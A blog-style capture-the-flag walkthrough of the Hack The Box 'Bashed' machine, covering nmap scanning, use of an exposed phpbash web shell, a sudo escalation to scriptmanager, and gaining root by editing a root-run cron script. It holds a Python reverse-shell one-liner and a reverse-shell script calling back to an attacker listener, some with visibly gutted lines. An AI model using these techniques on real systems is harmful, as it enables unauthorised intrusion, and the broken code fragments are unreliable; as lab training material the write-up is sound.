hack the box walkthrough – Bashed machine

Today new walkthrought about the hack the box machine Bashed.

It is an easy Linux machine released on dec. 2017 made by Arrexel.

Let’s jump it!


As usual we start with a nmap enumeration to find out what we are dealing with today:

[email protected]:~/Documents$ nmap -sC -sV -oA nmap
Starting Nmap 7.80 ( ) at 2020-12-11 15:58 EST
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 33.70% done; ETC: 16:01 (0:01:54 remaining)
Nmap scan report for
Host is up (1.0s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 143.57 seconds

It seems we have only an Apache web service running on port 80. Let’s have a look:

Seems a site talking about Arrexel’s dev progress. nothin interresting so far.

Let’s run a dirbuster scan to see if other pages can be found:

I found interresting files in dev folder: phpbash.min.php and phpbash.php. Let’s have a look:

Looks like we already have our shell!

I still prefer the shell with netcat:

nc -lvnp 1337
export RHOST="";export RPORT=1337;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'


Running a command sudo -l I found out I am able to run scriptmanager with sudo:

[email protected]:/var/www/html/dev$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

witht he following command I have been able to spaw a shell as scriptmanager:

[email protected]:/var/www/html/dev$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
[email protected]:/var/www/html/dev$ id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)


A linpeas enumeration output shows a uncommon folder “scripts” at the root

There are 2 files inside:

[email protected]:/scripts$ ls -al
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec 13 13:41 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager 1039 Dec 13 13:41
-rw-r--r--  1 root          root             8 Dec 13 15:00 test.txt
[email protected]:/scripts$ cat
f = open("test.txt", "w")

[email protected]:/scripts$ cat test.txt
[email protected]:/scripts$ 

It appears that the python script is executing by root every minutes to edit the file test.txt

Therefor I edited the script for having a reverse shell

[email protected]:/scripts$ cat
f = open("test.txt", "w")

import socket # For Building TCP Connection
import subprocess # To start the shell in the system

def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # start a socket object 's' 
    s.connect(('', 4242)) # Here we define the Attacker IP and the listening port

    while True: # keep receiving commands from the Kali machine
        command = s.recv(1024) # read the first KB of the tcp socket

        if 'terminate' in command: # if we got terminate order from the attacker, close the socket and break the loop

        else: # otherwise, we pass the received command to a shell process

            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            s.send( ) # send back the result
            s.send( ) # send back the error -if any-, such as syntax error

def main ():

[email protected]:/scripts$ 
nc -lvnp 1337

Waiting 1 min… then I am root !

[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [] from (UNKNOWN) [] 58776
uid=0(root) gid=0(root) groups=0(root)